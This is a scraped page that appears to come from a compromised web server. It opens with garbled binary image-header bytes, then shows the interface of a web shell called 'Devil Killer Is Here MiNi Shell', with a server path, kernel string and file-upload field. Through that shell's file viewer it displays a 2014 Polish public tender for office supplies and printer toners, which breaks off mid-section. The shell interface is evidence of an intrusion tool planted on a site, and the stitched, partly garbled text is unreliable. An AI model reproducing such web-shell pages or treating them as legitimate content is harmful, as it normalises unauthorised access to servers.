JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140212/49174-N-2014.html

<p class="kh_header"><b>Zielona Góra: Dostawa materiałów biurowych, tonerów, tuszy</b><br>
<b>Numer ogłoszenia: 49174 - 2014; data zamieszczenia: 12.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , ul. Zjednoczenia 110, 65-120 Zielona Góra, woj. lubuskie, tel. 68 322-91-86, faks 68 322-91-84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgkim.zgora.pl w zakładce zamówienia publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych, tonerów, tuszy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - Dostawa materiałów biurowych
Zakres zamówienia obejmuje sukcesywną dostawę do siedziby Zamawiającego oraz do komórek organizacyjnych  znajdujących się przy ul. Jedności 65, ul. Pl. Matejki 3d, ul. Sowińskiego 44a, ul. Waryńskiego 2, ul. Wrocławska 73 w terminie 24 godzin od dnia otrzymania zamówienia w formie pisemnej, faksem, telefonicznie lub drogą elektroniczną na określony asortyment, transportem wykonawcy i na jego koszt materiałów biurowych zgodnie z załączonym zestawieniem.
Przy czym zamawiający informuje, iż zakres zamawianego asortymentu może ulec zmianie do 10% wartości zamówienia. Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia.
W przypadku  stwierdzenia  wad  dostarczonego  towaru  Wykonawca  zobowiązuje  się  do  jego  wymiany  na  swój  koszt  w  terminie  48 - godzin.
Zestawienie towaru: BLOK BIUROWY A4 100 KARTEK	80	szt
BLOK BIUROWY A5 100 KARTEK 	100	szt
BRULION A4  96 KRATA  	40	szt
BRULION A5 96 KRATA	30	szt
CIENKOPIS Z FIBROWĄ KOŃCÓWKĄ PISZĄCĄ, OPRAWIONĄ W METAL O GRUBOŚCI 0,4 MM, TUSZ NA BAZIE WODY, WENTYLOWANA SKUWKA, RÓŻNE KOLORY	120	szt
PIÓRO KULKOWE Z WYMIENNYM WKŁADEM, TUSZ ODPORNY NA WARUNKI ATMOSFERYCZNE, WYKONANY W MIN. 80% Z MATERIAŁÓW PRZETWORZONYCH, GRUBOŚC LINI PISANIA 0,35MM, DŁUGOŚC LINI PISANIA 600M, RÓŻNE KOLORY	320	szt
DŁUGOPIS NA SPRĘŻYNCE PRZYKLEJANY DO BIURKA 	15	szt
DŁUGOPIS Z WYMIENNYM WKŁADEM OLEJOWYM, WODOODPORNYM I NIEBLAKNĄCYM, GUMOWY UCHWYT , PISZE PO KAŻDYM PAPIERZE,GRUBOŚĆ LINII PISANIA 0,27 MM , DŁUGOŚĆ LINI PISANIA 900M, RÓŻNE KOLORY	250	szt
DŁUGOPIS OLEJOWY  AUTOMATYCZNY PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	320	szt
DŁUGOPIS OLEJOWY  PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	350	 
DŁUGOPIS OLEJOWY ZWYKŁY	60	szt
DŁUGOPIS OLEJOWY, AUTOMATYCZNIE CHOWANY WKŁAD, GUMOWY UCHWYT, WKŁAD WYMIENNY, GRUBOŚĆ LINI PISANIA 0,3MM, ŚREDNICA KULKI PISZĄCEJ 0,7 MM	140	szt
DRUK DOWÓD DOSTAWY A6/100 SZT	60	bl
DRUK EWIDENCJA CZASU PRAC ROCZ A5/100SZT. W BLOCZKU	10	opk
DRUK EWIDENCJA WYJŚĆ W GODZ. SŁUŻBOWYCH A4/100SZT 	22	bl
DRUK EWIDENCJA WYPOSAŻENIA A5/SZT KARTON	30	szt
DRUK KP A6/100 	160	bl
DRUK  KSIĄŻKA DRUKÓW ŚCISŁEGO ZARACHOWANIA P-23	28	szt
DRUK KARTA MAGAZYNOWA A5/100SZT	35	bl
DRUK RAPORT KASOWY A4/100 SZT K-7	5	bl
DRUK KSIĄŻKA POCZTOWA A5 	50	szt
DRUK ROZLICZENIE ZALICZKI A6 100 SZT	6	bl
DRUK POLECENIE PRZELEWU A6 1+1/100 SZT	5	bl
DRUK RAPORT DZIENNY PRAC SPRZĘTU A5/100 SZT	25	bl
DRUK WYWIESZKA MAGAZYNOWA KARTON A6/100 SZT	40	bl
DRUK ZW 1/3 A4  6 POZYCYJNY 	65	bl
DRUK KARTA PRZEBIEGU ZATRUDNIENIA A4	850	szt
DZIURACZ WYKONANY Z METALU Z ANTYPOŚLIZGOWĄ PODSTAWĄ NIERYSUJĄCA MEBLI, DZIURKUJE DO 30 KARTEK JEDNORAZOWO, PRESYZYJNY OGRANICZNIK FORMATU Z OKIENKIEM DO JEGO PODGLĄDU, 10 LAT GWARANCJI	10	szt
ETYKIETY SAMOPRZYLEPNE 210X297    100 AKUSZY W OPAKOWANIU	5	opk
ETYKIETY SAMOPRZYLEPNE  70X37  100 ARKUSZY W OPAKOWANIU	5	opk
ETYKIETY DO SEGREGATORA 7CM SAMOPRZYLEPNE	15	opk
FASTYKUŁA A4 KPL Z TAŚMĄ	700	kpl
FOLIOPIS  LINIA PISANIA 1,0	60	szt
GUMKA DO MAZANIA BIAŁA 	80	szt
KALKULATOR 10 POZYCYJNY , POCHYLONY WYŚWIETLACZ, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, FUNKCJA CHECK&CORRECT, WYMIARY 135X143X27	10	szt
KALKULATOR 12 POZYCYJNY, PODWÓJNA PAMIĘĆ, ZAIKRĄGLANIE WYNUKÓW, OBLICZANIE MARŻY, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, WYMIARY 154X152X28,5	10	szt
KLEJ W SZTYFCIE 15G	100	szt
KLIPS 19MM/12 SZT	210	opk
KLIPS 32MM/12 	120	opk
KLIPS 51MM/12 	70	opk
KOPERTA BIAŁA B4/50  HK	20	opk
KOPERTA BIAŁA B5/50  SK	30	opk
KOPERTA BIAŁA C5/50  SK	20	opk
KOPERTA BIAŁA C4/50  SK	55	opk
KOPERTA BIAŁA C6/1000 OKNO PRAWE SK	10	opk
KOPERTA BIAŁA C6/1000 SK	12	opk
KOPERTA BIAŁA C6/50 SK	10	opk
KOPERTA BIAŁA DL/1000 OKNO PRAWE SK	80	opk
KOPERTA BIAŁA DL/1000  SK	8	opk
KOPERTA BIAŁA DL/50  SK	20	opk
KOREKTOR W PŁYNIE 	30	szt
KOREKTOR W TAŚMIE Z WYMIENNYM WKŁADEM, SZEROŚĆ 4,2MM DŁUGOŚĆ 6M, WYKONANY Z MATERIAŁÓW PRZETWORZONYCH	150	szt
KOREKTOR WKŁAD PILOT	200	szt
KSIĄŻKA KORESPONDENCYJNA  96 KARTEK	50	szt
LINIJKA 20CM  	15	szt
LINIJKA 30CM 	15	szt
MAZAK CD GRUBOŚĆ 1.0 CZARNY	30	szt
MAZAK DO ZNAKOWANIA BIELIZNY ALUMINIOWA OBUDOWA, LINIA PISANIA 1 MM, OKRĄGŁA KOŃCÓWKA	30	szt
MARKER PERMANENTNY , WODOODPORNY, NIE BLAKNIE POD WPŁYWEM SŁOŃCA, W ALUMINIOWEJ OBUDOWIE, ODPORNY NA WYSYCHANIE, WYTRZYMAŁA KOŃCÓWKA WYKONANA Z FIBRY, MOŻLIWOŚĆ WIELOKROTNEGO NAPEŁNIANIA TUSZEM, NIE ZAWIERA KSYLENU OKRAGŁA KOŃCÓWKA , LINIA PISANIA 1 MM DŁUGOŚĆ LINI PISANIA 900M 	120	szt
NOTES KOSTKA BIAŁA  KLEJONA  	200	szt
NOTES SAMOPRZYLEPNY 76X76   ŻÓŁTY	400	szt
ZAKŁADKI INDEKSUJĄCE SAMOPRZYLEPNE ROZMIAR 4X20X50 	200	opk
NOŻYCZKI 16 Z MIĘKKA RĄCZKĄ	20	szt
NOŻYCZKI 17  Z MIĘKKĄ RĄCZKĄ	20	szt
OBWOLUTA  A4/100 SZT GROSZKOWA	200	opk
OBWOLUTA A5/100 SZT GROSZKOWA	20	opk
OBWOLUTA  Z KLAPKA A4/10 SZT	140	opk
OŁÓWEK	120	szt
PAPIER DO FAXU 210/30 	10	szt
PAPIER KOMPUTEROWY 240X12 1 WARSTWA	10	kar
PAPIER KOMPUTEROWY 240X12 2  WARSTWY	20	kar
PAPIER KOMPUTEROWY 240X12 2 WARSTWY Z  NADRUKIEM	10	szt
PAPIER KOMPUTEROWY 240X12 3 WARSTWY	5	kar
PAPIER KOMPUTEROWY 360X12 1  WARTWA	15	szt
PAPIER KSERO A3 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	35	ryza
PAPIER KSERO A4 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	3300	ryza
PASEK SKOROSZYTOWY PLASTKOWY 25 SZT W OPAKOWANIU	10	szt
PIÓRO KULKOWE ZE SPECJALNYM DOZOWNIKIEM PRZEPŁYWU ATRAMENTU, PISZE NIEPRZERWANIE DO OSTATNIEJ KROPLI. ERGONOMICZNY GUMOWY UCHWUT, GŁOWICA PISZĄCA ZE STALI NIERDZEWNEJ, KULKA WYKONANA ZE STOPU WOLFRAMU I WEGLIKA, WENTYLOWANA SKUWKA Z KLIPEM, DŁUGOŚC LINI PISANIA 1400M, LINIA PISANIA 0,3 MM.	60	szt
PIÓRO KULKOWE AUTOMATYCZNE, TUSZ PIGMENTOWY, WODOODPORNY, ZASYCHA W CIĄGU 1 SEKUNDY, PISZE PO ŚLISKIM PAPIERZE, NIE PRZESIĄKA PRZEZ PAPIER, WYMIENNY WKŁAD.	20	szt
PIÓRO ŻELOWE AUTOMATYCZNE	30	szt
PŁYTA CD W PLASTKOWYM OPAKOWANIU	100	szt
PŁYTA DVD W PLASTKOWYM OPAKOWANIU	50	szt
PODKŁAD DO PISANIA PCV A4 	10	szt
PODKŁAD NA BIURKO SKÓROPODOBNY Z PRZYBORNIKIEM I WYPOSAŻENIEM 	12	szt
PODKŁAD DO PISANIA PCV A4 Z OKŁADKĄ 	20	szt
CHUSTECZKI NASĄCZONE DO CZYSZCZENIA EKRANU LCD	35	szt
PODUSZKA DO STĘPLI CZARNA 70X110	15	szt
SPRĘŻONE POWIETRZE DO CZYSZCZENIA SPRZĘTU KOMPUTEROWEGO	5	szt
PRZEKŁADKI  KARTONOWE KOLOR PRZEKŁDAKI ODPOWIADA KOLOROWI INDEKSU, WYKONANE Z KARTONU 170G/M2 UZYSKANE W DRODZE RECYKLINGU, POSIADAJĄ KARTĘ OPISOWĄ ORAZ PERFORACJĘ A4 12 STRON	110	opk
PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-12	20	opk
PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-31	15	opk
PRZEKŁADAKI WĄSKIE KARTONOWE OP.100 SZT. KOLOROWE	80	opk
ROLKI TERMICZNE 57/10-30M	10	opk
ROZSZYWACZ 	10	szt
SEGREGATOR OKLEINOWANY JEDNOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 50 I 70 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA	1300	szt
SEGREGATOR OKLEINOWANY OBUOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 70 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA, GWARANCJA NA MECHANIZM MINIMUM 3 LATA	300	szt
SKOROSZYT BIAŁY A4 KARTONOWY	250	szt
SKOROSZYT OCZKOWY 1/1 BIAŁY	1200	szt
SKOROSZYT OCZKOWY 1/2 BIAŁY	50	szt
SKOROSZYT POLIPROPYLENOWY A4	400	szt
SKOROSZYT ZAWIESZANY PCV A4	500	szt
SKOROSZYT PCV A4	300	szt
SKOROSZYT POLIPROPYLENOWY ZAWIESZANY A4	200	szt
SKOROSZYT ZAWIESZANY 1/1 BIAŁY	150	szt
SKOROSZYT ZAWIESZANY 1/2 BIAŁY	150	szt
SKOROWIDZ A4  96 KARTEK	5	szt
SPINACZE 28/100 OKRĄGŁE	500	opk
SPINACZE 50/100 OKRĄGŁE	80	opk
TACKA NA DOKUMENTY A4 PLASTIKOWA 	40	szt
TAŚMA BIUROWA 18X20M	200	szt
TAŚMA ARCHIWIZACYJNA DŁUGOŚC NA ZWOJU 100M BAWEŁNA 	15	szt
TAŚMA PAKOWA  BRĄZ AKRYL	30	szt
TECZKA DO PODPISU  10 KARTEK	30	szt
TECZKA WIĄZANA BIAŁA A4	700	szt
TECZKA Z GUMKĄ BIAŁA  A4	300	szt
TECZKA Z GUMKĄ Z PRESZPANU 	250	szt
TECZKA Z GUMKĄ JEDNOSTRONNIE BARWIONA, LAKIEROWANA, TEKTURA 400 GRAM	100	szt
TECZKA Z RZEPEM SKRZYDŁOWA KOLOROWA GRZBIET 4 CM	60	szt
TEMPERÓWKA METALOWA POJEDYŃCZA	40	szt
TUSZ DO STEMPLI CZARNY	60	szt
TUSZ DO STEMPLI CZERWONY	5	szt
TUSZ DO STEMPLI METALOWYCH	3	szt
WKŁAD DO DŁUGOPISU POPULARNEGO 	20	szt
WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZARNY (SN 100,101)	300	szt
WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZERWONY (SN 100,101)	5	szt
WKŁAD DO PIÓRA Z POZYCJI 80 NIEBIESKIE, CZARNE	10	szt
WKŁAD ŻELOWY HINOL AUT CZARNY	5	szt
WKŁAD ŻELOWY HINOL AUT  CZERWONY	30	szt
WKŁAD ŻELOWY HINOL AUT NIEBIESKI	50	szt
WKŁAD ŻELOWY PILOT G-2 NIEBIESKI	40	szt
ZAKREŚLACZ RÓŻNE KOLORY	300	szt
ZAWIESZKA DO KLUCZY 	50	szt
ZESZYT 16 KRATA	40	szt
ZESZYT 32 KRATA 	25	szt
ZESZYT 60 KRATA	30	szt
ZESZYT A4  96 KRATA 	15	szt
ZSZYWACZ Z METALU, TRZY SPOSOBY ZSZYWANIA, ZSZYWA DO 30 KARTEK JEDNORAZOWO, NA ZSZYWKI 24/6, 26/6 I 24/8 GŁĘBOKOŚC WSUWANIA KARTKI 65MM, GWARANCJA MINIMUM 10 LAT	40	szt
ZSZYWKI 10 	50	opk
ZSZYWKI 24/6  	150	opk
ZWILŻACZ ŻELOWY DO PALCÓW 20ML 	15	szt
zadanie 2: Dostawa tonerów, tuszy
Zakres zamówienia obejmuje sukcesywną dostawę do siedziby Zamawiającego oraz do komórek organizacyjnych  znajdujących się przy ul. Jedności 65, ul. Pl. Matejki 3d, ul. Sowińskiego 44a, ul. Waryńskiego 2, ul. Wrocławska 73 w terminie 24 godzin od dnia otrzymania zamówienia w formie pisemnej, faksem, telefonicznie lub drogą elektroniczną na określony asortyment, transportem wykonawcy i na jego koszt materiałów eksploatacyjnych takich  jak  :  tonery  do  drukarek  laserowych  i  faksów, taśm  do  drukarek  igłowych,  tuszy  do  drukarek  atramentowych,  taśm  do  streamera, folii  do  faksów, zgodnie z załączonym zestawieniem.
Przy czym zamawiający informuje, iż zakres zamawianego asortymentu może ulec zmianie do 10% wartości zamówienia. Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia.
W przypadku  stwierdzenia  wad  dostarczonego  towaru  Wykonawca  zobowiązuje  się  do  jego  wymiany  na  swój  koszt  w  terminie  48 - godzin.
Zestawienie towaru: 
TUSZ CANON  PGI-5 BK IP4200/5200/5200	2	szt
TUSZ CANON  PGI-521 BK IP3600/4600	3	szt
TUSZ CANON K CLI-521 CYAN	2	szt
TUSZ CANON K CLI-521 MAGENTA	2	szt
TUSZ CANON K CLI-521 YELLOW	2	szt
TUSZ CANON K CLI-8C CYAN	2	szt
TUSZ CANON K CLI-8M MAGENTA	2	szt
TUSZ CANON K CLI-8Y YELLOW	2	szt
TUSZ HP C4844A 10 BK 2000C/CP1700	2	szt
TUSZ HP C4906A 940XL BK	10	szt
TUSZ HP C8765E 338 BK 5740/6520/6620	2	szt
TUSZ HP K C4836A 11 CYAN 1700/1100	3	szt
TUSZ HP K C4907A 940XL CYAN	7	szt
TUSZ HP K C4908A 940XL MAGENTA	6	szt
BP HP K C4909A 940XL YELLOW	6	szt
TUSZ HP K C8766E 343 5940/8050/1510	3	szt
TONER HP L C4092A BK 1100/3200 	12	szt
TONER HP L C7115A BK 1200 	5	szt
TONER HP L CB435A BK P1005/1006	2	szt
TONER HP L CE255A BK P3015D	12	szt
TONER HP L CE278A BK P1566/1606 	3	szt
TONER HP L CE505A BK P2035/P2055	20	szt
TONER HP L Q2610A BK 2300 	5	szt
TONER HP L Q2612A BK 1010 	4	szt
TONER HP L Q2613A BK 1300	15	szt
TONER HP L Q5949A BK 1160/1320 	50	szt
TONER HP L Q7551A BK 3005 	28	szt
TONER HP L Q7553A BK 2015 	15	szt
TONER LEXMARK E120 BK 	15	szt
TONER SAMSUNG SCX-4521D3 	3	szt
TUSZ CANON CLI-551 BK IP7250/MG5450	12	szt
TUSZ CANON CLI-551 CYAN IP7250/MG5450	12	szt
TUSZ CANON CLI-551 MAGENTA IP7250/MG5450	12	szt
TUSZ CANON CLI-551 YELLOW IP7250/MG5450	12	szt
TUSZ CANON PGI-550 BK MG5450, MG6350	14	szt
TONER BROTHER TN-3380 5450/6180	3	szt
TONER CANON CRG-728 BK  2,1K	2	szt
TONER HP CB436A P1505/1522	3	szt
TONER KONICA MI 102B    	3	szt
TONER KONICA MI 302B DI250/350/2SZT	2	opk
TONER KONICA MI TN-303K	2	szt
TONER OKI B411D/B431D  3K	2	szt
TONER PHILIPS PFA741 LPF920/925/935	2	szt
TONER  HP CC530A BK CP2025	4	szt
TONER HP CC531A CYAN CP2025	3	szt
TONER  HP CC532A YELLOW	3	szt
TONER  HP CC533A MAGENTA	3	szt
TONER  HP CE255A P3015	35	szt
TONER PANASONIC KX-FA 83	3	szt
TONER SHARP AR-202T,M207,205	3	szt
TONER SHARP MX206 GT	2	szt
TONER SHARP MX312GT  M310	2	szt
TONER TOSHIBA T-3520E 350/450	4	szt
TONER TOSHIBA T-4590E	2	szt
TONER XEROX 3250 5K	5	szt
TONER XEROX 6125 BK	2	szt
TONER XEROX 6125 CYAN	2	szt
TONER XEROX 6125 MAGENTA	2	szt
TONER XEROX 6125 YELLOW	2	szt
TONER HP CC364X P4015	6	szt 
TAŚMA OKI 321	200	szt
FOLIA PANASONIC KX-FA 52E	2	szt
FOLIA PANASONIC KX-FA 57E	2	szt
TONER HP C3906A 5L 	4	szt
TAŚMA DO STREAMERA HP C5709A	20	szt
TAŚMA DO STREAMERA HP C8010A	20	szt
Zamawiający  dopuszcza  co  następuje:

1. Zamawiający dopuszcza zaoferowanie materiałów eksploatacyjnych równoważnych (tzw. zamienniki). Przez równoważne Zamawiający rozumie produkty w pełni kompatybilne z urządzeniami w których mają być użytkowane jako materiały eksploatacyjne, oraz posiadające nie gorsze niż produkty oryginalne parametry w zakresie wydajności, niezawodności oraz jakości. Zamontowanie i używanie materiałów eksploatacyjnych równoważnych nie może powodować utraty gwarancji producenta drukarki.
2. Oferowane materiały eksploatacyjne równoważne muszą być wytwarzane pod nadzorem zintegrowanego systemu zarządzania jakością, środowiskiem oraz BHP w zakresie projektowania, produkcji, testowania i dystrybucji komputerowych materiałów eksploatacyjnych zgodnego z wymogami norm ISO 9001:2008, 14001:2004 oraz PN-N 18001:2004.
W celu potwierdzenia spełnienia powyższego wymogu Zamawiający żąda dołączenia do oferty certyfikatów ISO 9001, ISO 14001 oraz PN-N 18001 lub równoważnych norm zharmonizowanych światowych/europejskich.
3.Oferowane produkty muszą być fabrycznie nowe, w oryginalnych opakowaniach producenta z widocznym logo i symbolem produktu, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem odpowiednie do uszczelnień stosowanych przez producentów urządzeń i gwarantujące bezpieczeństwo  użytkowania. 
4. W celu potwierdzenia że podstawowe parametry produktów równoważnych (wydajność, kompatybilność) są równe lub przekraczają parametry odpowiadających im produktów oryginalnych, Zamawiający żąda dołączenia do oferty specyfikacji parametrów technicznych (wydajność, kompatybilność, gwarancja) dla każdego produktu oraz raportów z testów wydajnościowych oferowanych produktów, w których producent potwierdza wskazane parametry. Zamawiający wymaga, aby testy wydajności prowadzone były zgodnie z międzynarodowymi normami, tj. ISO 19752:2004 i ISO 19798:2006 (dla kaset z tonerem do drukarek monochromatycznych i  kolorowych), ISO 24711:2006 (dla kartridży atramentowych). Raporty powinny być sporządzone w języku polskim oraz powinny zawierać wszystkie informacje wymagane przez wskazane normy.
5. Zamawiający wymaga, aby produkty równoważne objęte były dożywotnią gwarancją (bez limitu czasu i stopnia zużycia, trwającą do momentu wyczerpania ładunku barwiącego).
6. Oferowane równoważne materiały eksploatacyjne nie mogą powodować ograniczeń funkcji i możliwości sprzętu oraz zaniżać jakości wydruku w stosunku do materiałów oryginalnych. Wymagana jest również pełna kompatybilność z oprogramowaniem sprzętu: informowanie o liczbie wydrukowanych stron, poziomie zużycia tonera, tuszu, głowicy - jeśli sprzęt posiada takie możliwości. W przypadku, kiedy produkt oryginalny posiada wbudowany układ scalony, który monitoruje proces druku, produkt równoważny winien posiadać analogiczny element działający w ten sam sposób.
7. W przypadku awarii urządzenia drukującego, której przyczyną będzie użycie materiału eksploatacyjnego równoważnego (zgodnie z ofertą Wykonawcy) Wykonawca zobowiązuje się do naprawy lub dokona wymiany sprzętu na nowy na swój koszt. Naprawa odbędzie się w autoryzowanym serwisie i nie będzie powodować utraty dalszej gwarancji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.21.12-9, 30.19.23.00-4, 22.85.21.00-8, 22.85.30.00-4, 22.90.00.00-9, 30.14.12.00-1, 30.14.51.10-8, 30.19.00.00-7, 30.19.21.21-5, 30.19.21.30-1, 30.19.24.30-0, 30.19.25.00-6, 30.19.28.00-9, 30.19.73.00-9, 30.19.76.30-1, 30.19.92.30-1, 30.19.93.30-2, 30.19.95.00-5, 30.19.97.60-5, 30.23.43.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
